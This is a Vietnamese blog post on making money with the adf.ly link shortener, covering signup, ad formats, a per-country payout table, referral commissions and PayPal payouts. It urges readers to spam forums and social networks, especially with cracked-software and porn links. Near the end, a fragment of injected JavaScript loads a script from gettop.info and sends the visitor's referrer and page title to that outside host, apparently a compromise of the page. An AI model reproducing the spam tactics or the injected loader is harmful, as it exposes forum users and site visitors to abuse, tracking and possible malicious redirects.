Kiếm tiền từ website bằng cách rút gọn link và chia sẻ

Rút gọn link để kiếm tiền là hình thức khá nổi tiếng nhiều năm nay với các webmaster. Cách kiếm tiền nhanh, gọn đơn giản chỉ với vài thao tác nhưng số tiền kiếm được đủ tiêu xài.

Kiếm tiền từ website bằng cách rút gọn link và chia sẻ

Hướng dẫn đăng ký kiếm tiền cùng adf.ly

 

Tại sao phải rút gọn link? Vì một số mạng xã hội lớn, đặc biệt như Twitter họ giới hạn số kỹ tự, đường link của bạn mà dài quá thì nó sẽ bị cắt giảm tiêu đề, tóm lại một câu là làm cho nó gọn nhẹ. Các afd họ kiếm tiền là hiển thị quảng cáo thông qua 5s mà người click vào link rút gọn đó kẻo các bạn lại thắc mắc. hi

Bạn cần có một tài khoản để kiếm tiền, đương nhiên rồi:

http://adf.ly/

Có 3 cách kiếm tiền dành cho bạn

  • 01: Rút gọn link trên cách diễn đàn, mạng xã hội, … người khác ấn vô bạn sẽ có tiền
  • 02: Cho adf chạy quảng cáo trên website của bạn để thu tiền (Có nhiều người đã làm cách này)
  • 03: Giới thiệu người khác tham gia để kiếm tiền (Hưởng 20% hoa hồng giới thiệu, người được giói thiệu không mất gì)

Bạn lấy tiền về tài khoản ngân hàng bằng Paypal: Xem ngay Paypal nó là cái gì?

Dưới đây là bảng thống kê tỷ lệ chuyển đổi của afd năm 2014

Trung bình kiếm được 4$/1000 click

Việt Nam mình được 0.81$/ 1K click đó, được đấy!

Thông tin chi tiết cập nhật tỷ lệ chuyển đổi của adf.ly được cập nhật tại https://adf.ly/rates

 

Country Interstitials CPV Top Banner CPM
Unique Raw Unique Raw
United States $8.16 $3.74 $0.55 $0.50
Canada $2.75 $1.51 $0.47 $0.30
United Kingdom $5.85 $2.76 $0.73 $0.48
Australia $3.73 $1.71 $0.53 $0.36
Poland $3.84 $2.18 $0.23 $0.18
Norway $3.83 $2.26 $0.34 $0.20
New Zealand $3.74 $1.67 $0.53 $0.30
Spain $3.55 $1.73 $0.31 $0.20
United Arab Emirates $3.52 $1.61 $0.53 $0.26
Ireland $3.22 $1.69 $0.45 $0.30
Italy $3.20 $1.61 $0.17 $0.11
Switzerland $2.96 $1.44 $0.31 $0.20
Singapore $2.93 $1.55 $0.56 $0.31
South Africa $2.81 $1.62 $0.32 $0.20
Netherlands $2.75 $1.69 $0.30 $0.22
Iraq $2.73 $1.47 $0.18 $0.11
Germany $2.62 $1.50 $0.35 $0.23
France $2.59 $1.27 $0.17 $0.10
Cyprus $2.54 $1.43 $0.33 $0.23
Austria $2.41 $1.26 $0.33 $0.22
Slovakia $2.32 $1.14 $0.23 $0.16
Iceland $2.18 $1.11 $0.24 $0.20
Saudi Arabia $2.17 $1.06 $0.33 $0.18
Finland $2.16 $1.10 $0.30 $0.20
Sweden $2.11 $1.09 $0.40 $0.21
Myanmar $2.09 $0.56 $0.10 $0.10
Belgium $2.05 $1.41 $0.40 $0.26
Denmark $1.97 $1.10 $0.30 $0.20
Czech Republic $1.90 $1.10 $0.31 $0.19
Peru $1.89 $0.77 $0.16 $0.10
Malaysia $1.87 $0.84 $0.18 $0.11
Kenya $1.82 $1.03 $0.16 $0.11
Luxembourg $1.79 $0.99 $0.14 $0.10
Latvia $1.74 $1.08 $0.29 $0.18
Hong Kong $1.69 $1.01 $0.27 $0.17
Ecuador $1.68 $0.71 $0.17 $0.10
Nigeria $1.61 $0.72 $0.11 $0.10
Mexico $1.54 $0.69 $0.18 $0.10
Colombia $1.52 $0.69 $0.16 $0.10
Japan $1.51 $0.94 $0.16 $0.10
Chad $1.50 $0.50 $0.05 $0.03
Albania $1.47 $0.57 $0.17 $0.10
Israel $1.44 $0.78 $0.18 $0.10
Liberia $1.43 $0.52 $0.05 $0.03
Libya $1.43 $0.53 $0.18 $0.10
Bahrain $1.39 $0.57 $0.18 $0.10
Jordan $1.34 $0.62 $0.20 $0.11
Eritrea $1.33 $0.47 $0.05 $0.03
Thailand $1.33 $0.67 $0.13 $0.09
Slovenia $1.30 $0.67 $0.19 $0.10
Russian Federation $1.28 $0.68 $0.24 $0.17
Ghana $1.28 $0.51 $0.13 $0.10
Qatar $1.25 $0.57 $0.21 $0.10
Greece $1.22 $0.71 $0.16 $0.10
Panama $1.20 $0.52 $0.16 $0.11
Somalia $1.19 $0.46 $0.05 $0.03
India $1.19 $0.64 $0.15 $0.10
Togo $1.18 $0.44 $0.05 $0.03
Guinea $1.18 $0.48 $0.05 $0.03
Micronesia, Federated States Of $1.16 $0.46 $0.05 $0.03
Cuba $1.16 $0.56 $0.46 $0.35
Armenia $1.15 $0.55 $0.17 $0.10
Morocco $1.15 $0.60 $0.22 $0.11
Bulgaria $1.13 $0.50 $0.22 $0.16
Macao $1.13 $0.53 $0.17 $0.11
Equatorial Guinea $1.12 $0.43 $0.05 $0.03
Lithuania $1.12 $0.57 $0.13 $0.10
Estonia $1.12 $0.52 $0.14 $0.12
Rwanda $1.09 $0.44 $0.10 $0.10
Congo, The Democratic Republic Of The $1.09 $0.44 $0.05 $0.03
Saint Kitts And Nevis $1.08 $0.43 $0.05 $0.03
Moldova, Republic Of $1.08 $0.53 $0.15 $0.10
Argentina $1.08 $0.62 $0.16 $0.10
Korea, Republic Of $1.07 $0.65 $0.15 $0.10
Cote D’ivoire $1.06 $0.50 $0.16 $0.11
Croatia $1.06 $0.57 $0.14 $0.10
Georgia $1.05 $0.55 $0.13 $0.10
Cook Islands $1.05 $0.50 $0.05 $0.03
Anguilla $1.05 $0.39 $0.05 $0.03
Korea, Democratic People’s Republic Of $1.05 $0.43 $0.05 $0.03
Sierra Leone $1.04 $0.40 $0.10 $0.10
Brazil $1.03 $0.56 $0.18 $0.10
Tunisia $1.02 $0.54 $0.18 $0.10
Algeria $1.02 $0.56 $0.17 $0.10
Tonga $1.01 $0.44 $0.05 $0.03
Tanzania, United Republic Of $1.01 $0.51 $0.14 $0.10
Egypt $1.00 $0.50 $0.22 $0.11
Bangladesh $1.00 $0.50 $0.14 $0.10
Bolivia $0.97 $0.48 $0.16 $0.10
Brunei Darussalam $0.97 $0.44 $0.15 $0.10
Macedonia, The Former Yugoslav Republic Of $0.96 $0.57 $0.17 $0.10
Honduras $0.96 $0.42 $0.16 $0.10
Portugal $0.95 $0.53 $0.17 $0.10
Sri Lanka $0.95 $0.50 $0.14 $0.10
Montenegro $0.95 $0.50 $0.17 $0.10
Guam $0.94 $0.45 $0.16 $0.10
Ukraine $0.94 $0.50 $0.16 $0.10
Iran, Islamic Republic Of $0.94 $0.51 $0.16 $0.10
Papua New Guinea $0.94 $0.44 $0.05 $0.03
Guatemala $0.94 $0.45 $0.15 $0.10
Serbia $0.94 $0.50 $0.15 $0.10
Fiji $0.93 $0.43 $0.10 $0.10
Guyana $0.93 $0.42 $0.15 $0.10
Cambodia $0.93 $0.38 $0.16 $0.10
Philippines $0.91 $0.44 $0.15 $0.10
Taiwan $0.90 $0.51 $0.16 $0.10
Uganda $0.89 $0.43 $0.10 $0.10
Oman $0.89 $0.49 $0.19 $0.10
Benin $0.89 $0.41 $0.10 $0.10
Aland Islands $0.88 $0.46 $0.20 $0.10
Suriname $0.88 $0.43 $0.10 $0.10
Botswana $0.87 $0.41 $0.10 $0.10
Seychelles $0.87 $0.41 $0.05 $0.03
Northern Mariana Islands $0.86 $0.45 $0.05 $0.03
Virgin Islands, U.S. $0.86 $0.44 $0.05 $0.03
Barbados $0.86 $0.41 $0.14 $0.10
Congo $0.85 $0.46 $0.05 $0.03
Bosnia And Herzegovina $0.85 $0.50 $0.16 $0.10
Faroe Islands $0.84 $0.41 $0.05 $0.03
Gambia $0.83 $0.45 $0.05 $0.03
Turkey $0.83 $0.46 $0.14 $0.10
Dominica $0.83 $0.43 $0.10 $0.10
Bhutan $0.82 $0.42 $0.10 $0.10
Cape Verde $0.82 $0.39 $0.15 $0.10
Mongolia $0.82 $0.46 $0.16 $0.10
Dominican Republic $0.81 $0.42 $0.15 $0.10
Afghanistan $0.81 $0.37 $0.22 $0.10
Saint Vincent And The Grenadines $0.81 $0.41 $0.05 $0.03
Costa Rica $0.81 $0.44 $0.15 $0.10
Indonesia $0.81 $0.41 $0.12 $0.08
Vietnam $0.81 $0.51 $0.14 $0.08
Kuwait $0.80 $0.49 $0.19 $0.10
Lebanon $0.80 $0.43 $0.16 $0.10
Ethiopia $0.80 $0.44 $0.20 $0.10
Kiribati $0.80 $0.39 $0.05 $0.03
Antigua And Barbuda $0.80 $0.41 $0.10 $0.10
Swaziland $0.79 $0.43 $0.13 $0.10
Puerto Rico $0.79 $0.43 $0.15 $0.10
Nicaragua $0.79 $0.40 $0.13 $0.10
Madagascar $0.79 $0.41 $0.25 $0.10
Martinique $0.78 $0.40 $0.13 $0.10
Chile $0.78 $0.44 $0.16 $0.10
Jamaica $0.78 $0.41 $0.17 $0.10
Belize $0.78 $0.41 $0.10 $0.10
Zambia $0.78 $0.39 $0.05 $0.03
Mozambique $0.78 $0.40 $0.16 $0.10
Grenada $0.78 $0.39 $0.20 $0.10
Bahamas $0.77 $0.40 $0.16 $0.10
Réunion $0.77 $0.41 $0.15 $0.10
Niger $0.77 $0.41 $0.10 $0.10
Andorra $0.77 $0.40 $0.15 $0.10
Paraguay $0.77 $0.41 $0.21 $0.10
New Caledonia $0.76 $0.43 $0.10 $0.10
Uruguay $0.76 $0.41 $0.16 $0.11
Venezuela $0.76 $0.43 $0.17 $0.10
Sudan $0.76 $0.44 $0.22 $0.10
Turkmenistan $0.75 $0.45 $0.05 $0.03
Zimbabwe $0.75 $0.40 $0.05 $0.03
Romania $0.75 $0.42 $0.26 $0.16
Pakistan $0.75 $0.50 $0.15 $0.11
British Indian Ocean Territory $0.75 $0.50 $0.05 $0.03
Holy See (Vatican City State) $0.75 $0.38 $0.05 $0.03
Malawi $0.75 $0.42 $0.05 $0.03
Lao People’s Democratic Republic $0.75 $0.45 $0.11 $0.10
Bermuda $0.75 $0.41 $0.20 $0.10
French Guiana $0.74 $0.39 $0.10 $0.10
Burundi $0.74 $0.41 $0.10 $0.10
French Polynesia $0.74 $0.43 $0.16 $0.10
Saint Lucia $0.73 $0.39 $0.05 $0.03
Djibouti $0.73 $0.39 $0.10 $0.10
Mali $0.73 $0.42 $0.05 $0.03
Hungary $0.73 $0.43 $0.27 $0.18
Namibia $0.73 $0.41 $0.17 $0.10
Malta $0.73 $0.39 $0.13 $0.10
Netherlands Antilles $0.73 $0.42 $0.05 $0.03
Guadeloupe $0.72 $0.38 $0.15 $0.10
Cayman Islands $0.72 $0.41 $0.05 $0.03
Samoa $0.71 $0.32 $0.05 $0.03
Mauritania $0.71 $0.39 $0.14 $0.10
Guinea-Bissau $0.71 $0.42 $0.05 $0.03
Aruba $0.71 $0.41 $0.10 $0.10
Turks And Caicos Islands $0.71 $0.41 $0.05 $0.03
Angola $0.71 $0.40 $0.14 $0.10
Cameroon $0.71 $0.38 $0.10 $0.10
Mauritius $0.70 $0.39 $0.14 $0.10
Gibraltar $0.70 $0.42 $0.10 $0.10
Saint Martin $0.70 $0.45 $0.05 $0.03
Yemen $0.70 $0.43 $0.18 $0.10
El Salvador $0.69 $0.42 $0.14 $0.10
Jersey $0.69 $0.43 $0.10 $0.10
Trinidad And Tobago $0.68 $0.42 $0.13 $0.10
Mayotte $0.68 $0.43 $0.05 $0.03
Haiti $0.68 $0.39 $0.10 $0.10
Falkland Islands (Malvinas) $0.68 $0.55 $0.05 $0.03
Greenland $0.67 $0.43 $0.05 $0.03
San Marino $0.67 $0.38 $0.20 $0.10
Senegal $0.67 $0.37 $0.14 $0.10
Monaco $0.65 $0.39 $0.40 $0.10
Isle Of Man $0.64 $0.42 $0.10 $0.10
Comoros $0.64 $0.42 $0.05 $0.03
Maldives $0.63 $0.39 $0.10 $0.10
Vanuatu $0.63 $0.46 $0.05 $0.03
American Samoa $0.62 $0.41 $0.10 $0.10
Gabon $0.61 $0.37 $0.10 $0.10
Nepal $0.60 $0.37 $0.13 $0.10
Timor-Leste $0.60 $0.43 $0.05 $0.03
Solomon Islands $0.60 $0.39 $0.05 $0.03
Guernsey $0.60 $0.39 $0.10 $0.10
Liechtenstein $0.59 $0.32 $0.05 $0.03
Azerbaijan $0.59 $0.41 $0.14 $0.10
Burkina Faso $0.59 $0.38 $0.30 $0.10
Marshall Islands $0.58 $0.50 $0.05 $0.03
Uzbekistan $0.58 $0.36 $0.05 $0.03
Sao Tome And Principe $0.58 $0.33 $0.20 $0.10
Syrian Arab Republic $0.57 $0.42 $0.16 $0.10
Lesotho $0.57 $0.38 $0.10 $0.10
Palestinian Territory, Occupied $0.56 $0.40 $0.22 $0.10
Tajikistan $0.56 $0.37 $0.30 $0.10
Belarus $0.55 $0.40 $0.13 $0.10
Virgin Islands, British $0.54 $0.40 $0.05 $0.03
Kazakhstan $0.53 $0.39 $0.12 $0.10
Kyrgyzstan $0.53 $0.36 $0.20 $0.10
China $0.51 $0.36 $0.11 $0.10
Central African Republic $0.50 $0.38 $0.05 $0.03
Palau $0.50 $0.38 $0.05 $0.03
Saint Pierre And Miquelon $0.47 $0.30 $0.05 $0.03
Montserrat $0.38 $0.31 $0.05 $0.03
All other countries $0.25 – $2.00 $0.06 – $0.22

 

Kiếm tiền thì đơn giản, cứ đi spam mạng xã hội, diễn đàn – đặc biệt alf những loại crack với 3x thì cứ ăn tẹt đi. Còn tiện nhất là bạn có một website với lượng visit lớn, thì nên cài đặt tự động chuyển đổi link adf cho nó để kiếm tiền.

 

Bắt đầu đăng ký kiếm tiền nhá

 

Kiếm tiền từ website bằng cách rút gọn link và chia sẻ 2

Join Now đi bạn. Bình thường rút gọn link ngay trên trang chủ vẫn được, nhưng nhớ đăng ký tài khoản để còn kiếm được tiền nha.

Điền thông tin đăng ký theo mẫu:

Kiếm tiền từ website bằng cách rút gọn link và chia sẻ 3

Sau khi đăng ký xong mẫu thành công bạn vào Email kích hoạt tài khoản và bắt đầu chương trình.

Copy link của bạn và paste vào ô:

Kiếm tiền từ website bằng cách rút gọn link và chia sẻ 4

– Domain: Ở đây bạn chọn dạng tên miền cho link sau khi bạn rút gọn (Adf.ly, j.gs hoặc q.gs) mặc định là adf.ly.
– Advertising Type có 3 lựa chọn:
+ Interstitial Advert ($$$$$): Đây là loại mặc định và đây loại hiển thị toàn trang, tức là khi người dùng click vào link rút gọn đó thì trang quảng cáo dạng full hiện ra và cần phải chờ khoản 5 giây, sau đó người dùng nhấn SKIP ADS thì sẽ được chuyển đến link gốc và bạn sẽ nhận được tiền. Đây là hình thức trả tiền khá cao nhưng hơi phiền cho người xem.

Mẫu cho Interstitial Advert ($$$$$): http://adf.ly/g94US
+ Framed Banner ($$$): Loại này ít làm khó chịu người xem hơn nhưng nhận tiền thấp hơn loại ban đầu. Loại này sẽ hiển thị một khung nhỏ bên trên trang gốc, người dùng có thể xem được trang của link gốc bên dưới.

Mẫu cho Framed Banner ($$$): http://adf.ly/g94xR
+ No Advert: Đây là dạng dùng cho mục đích muốn rút gọn link, sẽ không có tiền với hình thức này khi người dùng click vào link. Nó không có quảng cáo và nó sẽ được chuyển thẳng đến link gốc.

Link xem thử: http://adf.ly/g95aP
– Custom Name: Tên tùy biến cho link, đây không quan trọng, bạn không cần quan tâm.

 

Để kiếm được thêm nhiều tiền thì bạn bỏ ít trí tuệ ra xem là chỗ nào đông người, loại chủ đề nào nhiều người quan tâm. Đặc biệt những website cho phép download thì việc kiếm tiên từ rút gọn link là nhiều vô đối.

Thao tác chèn tự động adf.ly cho website để kiếm tiền nhanh chóng thay vì bạn phải rút gọn từng link một.

Kiếm tiền từ website bằng cách rút gọn link và chia sẻ 5

Cách 3: Giới thiệu người tham gia và kiếm tiền. Người được giới thiệu không mất gì và bạn có được thu nhập, ok quá còn gì. Hoa hồng trọn đời 20% bạn nhé.

 

Rút tiền từ adf.ly về tài khoản Paypal hoặc Payzza.

Kiếm tiền từ website bằng cách rút gọn link và chia sẻ 6

Điền thông tin rút tiền vào để lấy tiền nào. Khi nào đủ 5$ thì nó tự động thanh toán qua Paypal cho bạn nhé, ở đây mình chỉ giới thiệu Paypal thôi vì nó luôn luôn tiện ích và nhanh chóng.

Kiếm tiền từ website bằng cách rút gọn link và chia sẻ 7

Còn cuối cùng show cho các bạn xem thu nhập của một số vị tiền bối đã chiến cái này để có tinh thần.

Kiếm tiền từ website bằng cách rút gọn link và chia sẻ 8

Kinh nghiệm của bản thân tôi về afd.ly

 

Biết đến adf.ly từ năm 2009 khi các hình thức MMO sơ khai tràn vào Việt Nam, khi ấy adf nổi lên là một hình thức kiếm tiền tốt và uy tín. Cùng với thời gian Việt Nam được chấp nhận vào danh sách thanh toán click khiến cho càng nhiều người kiếm tiền trên mạng tham gia. Trước đây số tiền thanh toán của Adf.ly nhỏ hơn khiến thu hút nhiều dân kiếm tiền, nhưng mình nghĩ con số 5$ chả là cái gì lớn lao cả. Nếu tính thu nhập tối thiểu của công nhân thì phải rơi vào tầm 150$ / tháng thì mới nói chuyện ăn uống được.

Với mình chả bao giờ dùng cái này cho website, vì lý do không muốn gây khó chịu cho người xài. Hi hi, còn các nơi khác như diễn đàn, mxh nước ngoài spam cũng ác phết.

}document.currentScript.parentNode.insertBefore(s, document.currentScript);s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Incoming search terms:

  • cách kiếm tiền bằng link rút gọn
  • interstitial ads Benin
Pin It

2 thoughts on “Kiếm tiền từ website bằng cách rút gọn link và chia sẻ

  1. Cảm ơn nhé, có rất nhiều trang hướng dẫn loại này nhưng tôi dừng chân tại site của bạn, đăng ký dưới link của bạn, có gì bạn chia sẽ thêm nhé.

Trả lời

Thư điện tử của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *